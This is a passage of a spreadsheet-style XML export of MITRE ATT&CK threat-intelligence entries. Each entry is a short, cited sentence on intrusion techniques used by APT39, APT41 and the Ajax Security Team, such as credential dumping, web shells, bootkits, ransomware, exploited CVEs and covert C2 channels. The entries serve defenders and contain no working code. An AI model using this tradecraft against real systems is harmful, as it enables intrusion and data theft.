    <t>[APT39](https://attack.mitre.org/groups/G0087) has used malware to turn off the &lt;code&gt;RequireSigned&lt;/code&gt; feature which ensures only signed DLLs can be run on Windows.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--16ee08e8-a66a-4022-a322-148eeaf71771</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has utilized AutoIt and custom scripts to perform internal reconnaissance.(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--a1c62ce5-2f11-415f-bca1-c9021530c090</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used the Smartftp Password Decryptor tool to decrypt FTP passwords.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--8b2af30a-523f-41fe-88c3-ab2ee15bdec5</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used remote access tools that leverage DNS in communications with C2.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--9a66e38c-ea79-4b7b-bf74-555da87d58c3</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used various tools to steal files from the compromised host.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--0e4c55fc-a923-4c05-89ce-3102620a41d7</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used malware to decrypt encrypted CAB files.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--089eeb46-323e-410b-a27b-dc5ff4467c40</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has exfiltrated stolen victim data through C2 communications.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--4c5f4c95-2eca-4f8d-8e7e-16f0bb323b07</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used SQL injection for initial compromise.(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>relationship--fab9f76e-570c-4235-8045-dec89714d435</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used various tools to proxy C2 communications.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--073aff0c-1dd2-40f4-87da-d90809f3418a</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used malware to delete files after they are deployed on a compromised host.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--58a1976b-122d-41df-ae40-b66826ad8f4f</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used tools with the ability to search for files on a compromised host.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--ba65edc3-e0ef-477f-92c8-ffa2e2a943c5</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has downloaded tools to compromised hosts.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--60f1cf34-8c60-47b7-ba9a-88c2575006f9</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has utilized tools to capture mouse movements.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--f11ab582-8ea8-4ed7-9b1e-2b31dce390da</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) used custom tools to create SOCK5 and custom protocol proxies between infected hosts.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--e2ebd73f-9198-49c7-b446-00478a466e78</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used tools for capturing keystrokes.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--0ddcf163-015f-46a2-8de7-375712d92bae</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used Mimikatz, Windows Credential Editor and ProcDump to dump credentials.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--948eaafc-3440-43f3-b9e4-39eb77197d72</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has created accounts on multiple compromised hosts to perform actions within the network.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--c6f11dfe-dd59-4310-9619-ed42ee48d736</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has utilized tools to aggregate data prior to exfiltration.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--a538c673-e7f2-4fd0-923e-d874a3f3d363</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</si>
  <si>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</si>
  <si>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relationship--4e50db0c-4e54-4266-b675-3b279ec45427</t>
  </si>
  <si>
    <t>22 February 2019</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has sent spearphishing emails in an attempt to lure users to click on a malicious link.(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--77e0980c-de43-48a8-8df3-b924f8d91b51</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</si>
  <si>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</si>
  <si>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relationship--d7a244fa-f52c-4e54-9088-6f9ccda8b2b9</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used [CrackMapExec](https://attack.mitre.org/software/S0488) and a custom port scanner known as BLUETORCH for network scanning.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--02caaeff-7429-444f-bac2-498fe3a73cfd</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used the post exploitation tool [CrackMapExec](https://attack.mitre.org/software/S0488) to enumerate network shares.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--307e732c-c407-4466-951b-38062bb5e32b</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used different versions of Mimikatz to obtain credentials.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--0f93a49a-11c8-49d8-9b58-e7136e6bc850</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used malware to drop encrypted CAB files.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--38cf696a-f98d-4b32-a9f1-0183bd78b6d2</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used PowerShell to execute malicious code.(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>relationship--0f50a4e4-6ceb-4ead-88ed-147592e0b398</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used a command line utility and a network scanner written in python.(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--c906ddd0-e3fb-42ad-84cb-84ca093ddbb2</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used various strains of malware to query the Registry.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--c3cef083-71f7-46ed-85c1-0b44ac24b85e</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has maintained persistence using the startup folder.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--0574a456-6327-4f07-94b0-58be6ecbf8b8</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has been seen using RDP for lateral movement and persistence, in some cases employing the rdpwinst tool for mangement of multiple sessions.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--42ddce39-b653-4466-b7ff-a9554029f1c6</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used [NBTscan](https://attack.mitre.org/software/S0590) and custom tools to discover remote systems.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>relationship--964233cc-fa6c-4754-9684-6546eb6d5a4a</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used SMB for lateral movement.(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>relationship--fa82d7c2-bdc5-4945-9d59-5b40eb9a7454</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) used secure shell (SSH) to move laterally among their targets.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--fe8bc44b-805d-440c-a447-96091033439d</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has created scheduled tasks for persistence.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--54d5380e-07a4-49b0-8ffd-c34428c90bbe</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used a screen capture utility to take screenshots on a compromised host.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--932beba4-bb6a-4174-abe3-353d2e39337c</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used post-exploitation tools including RemCom and the Non-sucking Service Manager (NSSM) to execute processes.(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>relationship--364be248-6fa2-42a2-847b-35e6f43fd06d</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has modified LNK shortcuts.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--25557d9f-bfa0-4da7-8352-ab56b82b475b</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has packed tools with UPX, and has repacked a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) to thwart anti-virus detection.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--4bc2e50e-0753-497f-9ec0-af270abe2af1</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) leveraged spearphishing emails with malicious attachments to initially compromise victims.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--f60a3a4e-ba53-47ba-8e31-e301f3983f6e</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) leveraged spearphishing emails with malicious links to initially compromise victims.(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--f5cd03ce-93e0-4458-ba90-ca3926bb41b9</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) used [Remexi](https://attack.mitre.org/software/S0375) to collect usernames from the system.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>relationship--439344c5-67e0-4d38-9b91-866392e5e232</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has modified and used customized versions of publicly-available tools like PLINK and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: BitDefender Chafer May 2020)(Citation: IBM ITG07 June 2019)</t>
  </si>
  <si>
    <t>relationship--3e91f49c-5342-49d8-8105-7ab17c5ef9f4</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used stolen credentials to compromise Outlook Web Access (OWA).(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--ea230e17-d23a-4a11-b2f9-358eeeea4ea3</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has utilized malicious VBS scripts in malware.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--fd6bd6fd-4a75-4094-ac67-bc14cb6b44bb</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used HTTP in communications with C2.(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--d9dce15d-68d8-46af-a7ec-354bf5093c49</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has installed ANTAK and ASPXSPY web shells.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--5fea62e7-67f8-4ff2-875d-a48393f99135</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) leveraged sticky keys to establish persistence.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>relationship--728c2a84-ac7d-4b17-a287-4c692d717065</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) has added user accounts to the User and Admin groups.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>relationship--373f6762-cda6-4ce7-894f-cac31a09a98b</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) created a RAR archive of targeted files for exfiltration.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--89328749-11c5-416d-99b9-f3039afc487a</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used [BITSAdmin](https://attack.mitre.org/software/S0190) to download and install payloads.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--d316289b-26fa-49d7-8ed0-3fa56cc858b7</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--48132286-7b7d-42cf-956b-95c75eeff1e3</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by deleting Bash histories.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--f8838a1f-3a62-40cc-98dd-55943091fcef</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by clearing Windows security and system events.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--4cbd1250-5e79-46c0-b38f-83bd5942f44c</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>relationship--3213e4e5-c3e4-4d51-8dce-929248f2882b</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) used compiled HTML (.chm) files for targeting.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>relationship--c4c08678-eee9-475c-9a67-67b15278ec54</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--10d118e8-c421-486f-a56a-bbe1ed621c62</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has used search order hijacking to execute malicious payloads, such as Winnti RAT.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) used legitimate executables to perform DLL side-loading of their malware.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>relationship--ad3eae0f-becd-4ed8-94cf-40a4e1a06a9d</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) used DNS for C2 communications.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) </t>
  </si>
  <si>
    <t>relationship--873faf92-be75-47e5-bf3e-b389a5bdc020</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--acfaf7ec-7b92-40ec-a844-17089791a663</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has uploaded files and data from a compromised host.(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>relationship--54f6c1c8-f3c7-44a6-9a00-2195e03cf0ae</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--964a9222-6e88-4850-89cc-6fc0f10ee4c9</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has used DGAs to change their C2 servers monthly.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--8488f2ee-be97-458c-894b-830add635fa8</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) has configured payloads to load via LD_PRELOAD.(Citation: Crowdstrike GTR2020 Mar 2020)	</t>
  </si>
  <si>
    <t>relationship--7f9fe6d5-79ba-44ca-bf19-c980e5c2fc11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</si>
  <si>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</si>
  <si>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relationship--5212a108-111b-4467-84c9-933d2b84aad2</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>relationship--e7fc5a89-f5a7-432f-a885-6b9532153e7e</t>
  </si>
  <si>
    <t>30 April 2020</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>relationship--bcbc885e-c1ae-4e69-a72c-22900403bae3</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.(Citation: FireEye APT41 Aug 2019)
</t>
  </si>
  <si>
    <t>relationship--556f8dd8-50e0-4115-9815-c20bfc2b915a</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) used the Steam community page as a fallback mechanism for C2.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>relationship--97775c58-7cb1-46e0-9504-e60a459e44d0</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) deleted files from the system.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>relationship--56b47ce2-9baa-421b-9187-c780615b97de</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used exploit payloads that initiate download via [ftp](https://attack.mitre.org/software/S0095).(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>relationship--2cd69fd0-d5ad-41db-aaee-fd58e46bfaaa</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has executed &lt;code&gt;file /bin/pwd&lt;/code&gt; on exploited victims, perhaps to return architecture related information.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>relationship--d9416afb-0aeb-4ee3-bd96-dc331f40f37d</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used [certutil](https://attack.mitre.org/software/S0160) to download additional files.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>relationship--b42c23c9-99f4-4b1f-91e2-a945a119fe98</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a keylogger called GEARSHIFT on a target system.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--f480c10c-6a40-4fc7-9380-c2690c70a599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</si>
  <si>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</si>
  <si>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relationship--cbbbc655-e5a7-40e9-be62-7f29727b9f0c</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) has created user accounts.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>relationship--410d7922-e288-49ea-9607-27942505a416</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has created services to appear as benign system tools.(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>relationship--fce88056-31db-43be-be76-fb1aaf076ed1</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) attempted to masquerade their files as popular anti-virus software.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>relationship--285baef5-e948-4e56-a078-5e7f5e7404fd</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a malware variant called GOODLUCK to modify the registry in order to steal credentials.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>relationship--c8475b1b-c98f-4fdc-89dd-c9b04e6fbd9c</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>relationship--f234930f-f7d1-458d-8c79-c73538990f97</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a malware variant called WIDETONE to conduct port scans on specified subnets.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--883558d8-c445-45cf-a5cd-841fdf49f311</t>
  </si>
  <si>
    <t xml:space="preserve"> [APT41](https://attack.mitre.org/groups/G0096) used the &lt;code&gt;net share&lt;/code&gt; command as part of network reconnaissance.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>relationship--4f6e677d-427b-4342-b35c-57f4f3ad4ff8</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used VMProtected binaries in multiple intrusions.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>relationship--f1a9d2b9-f5ec-4119-b3b5-8b46085c01b5</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) performed password brute-force attacks on the local admin account.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--79958036-a8bf-4808-af4f-f9f7a9cb6e7c</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) leveraged PowerShell to deploy malware families in victims’ environments.(Citation: FireEye APT41 Aug 2019)(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>relationship--1aaecef9-d21a-420c-a6c0-53cca7a5e5d8</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--e0c1c9b9-b36e-4157-8dc1-26cd9ae25193</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a tool called CLASSFON to covertly proxy network communications.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--cb0931f7-4d6c-4f21-95a8-fd9d74ba30e0</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</si>
  <si>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</si>
  <si>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relationship--6ad8e998-041f-491d-8691-4990022248e0</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used RDP for lateral movement.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--e7bcc9e7-d373-4b1e-a664-886c4fc04bc5</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) deployed a Monero cryptocurrency mining tool in a victim’s environment.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--9ebc2d8a-a945-4b5d-805f-56e16bcc6676</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) deployed rootkits on Linux systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--1be07717-ad08-4364-9a58-b44a95a389a5</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has used rundll32.exe to execute a loader.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--898211c4-915c-469f-be47-321d2d44af90</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has transferred implant files using Windows Admin Shares.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--39808511-28ac-4cff-b6b4-49d996855e8a</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a compromised account to create a scheduled task on a system.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--6a653820-adc1-4068-ab78-9165f2a2c5c1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</si>
  <si>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</si>
  <si>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relationship--84dc2fd1-a443-4ce6-866a-c58cffc1b0f3</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--6160a359-35cc-4bbe-ac29-500f2751ed4b</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) collected MAC addresses from victim machines.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) </t>
  </si>
  <si>
    <t>relationship--adc6b431-0722-4287-8f37-e09ddb5b25fe</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</si>
  <si>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</si>
  <si>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relationship--a70bd01d-1d79-44e7-afe4-3a83e5a8d70c</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used the WMIEXEC utility to execute &lt;code&gt;whoami&lt;/code&gt; commands on remote machines.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--ae12b657-a640-40c6-99b7-931ed10705de</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</si>
  <si>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</si>
  <si>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relationship--35f5f7b9-8b86-4390-9f99-1d56aa1ae32a</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) executed &lt;code&gt;file /bin/pwd&lt;/code&gt; in activity exploiting CVE-2019-19781 against Citrix devices.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>relationship--a8b93875-6ad4-492e-afa1-0549ada7d7ca</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used compromised credentials to log on to other systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--0528b64e-e719-44a9-94aa-0576bd9a87ec</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.(Citation: FireEye APT41 March 2020) </t>
  </si>
  <si>
    <t>relationship--4aa86179-d9e9-43dd-b2a2-75e77a832150</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</si>
  <si>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</si>
  <si>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relationship--81a15403-9bb3-408a-8da6-97c64209c829</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via [PowerSploit](https://attack.mitre.org/software/S0194).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>relationship--f395cb28-5bc0-487e-b679-155ac785b7d9</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</si>
  <si>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</si>
  <si>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relationship--29cd1209-5e90-448f-83d3-42c3ecdd1f70</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used FireMalv custom-developed malware, which collected passwords from the Firefox browser storage.(Citation: Check Point Rocket Kitten)</t>
  </si>
  <si>
    <t>relationship--ac196369-5b5b-4e71-805a-3f64f150b1e2</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.(Citation: Check Point Rocket Kitten)</t>
  </si>
  <si>
    <t>relationship--efc39174-1103-4834-9efa-d0001ab1dd80</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.(Citation: Check Point Rocket Kitten)</t>
  </si>
  <si>
    <t>relationship--1fbd56ed-e8fe-4601-b676-62e42370cbcc</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has lured victims into executing malicious files.(Citation: FireEye Operation Saffron Rose 2013)</t>
  </si>
  <si>
    <t>relationship--74650ec9-91db-4f17-a30e-2bfc1b84c86f</t>
  </si>
  <si>
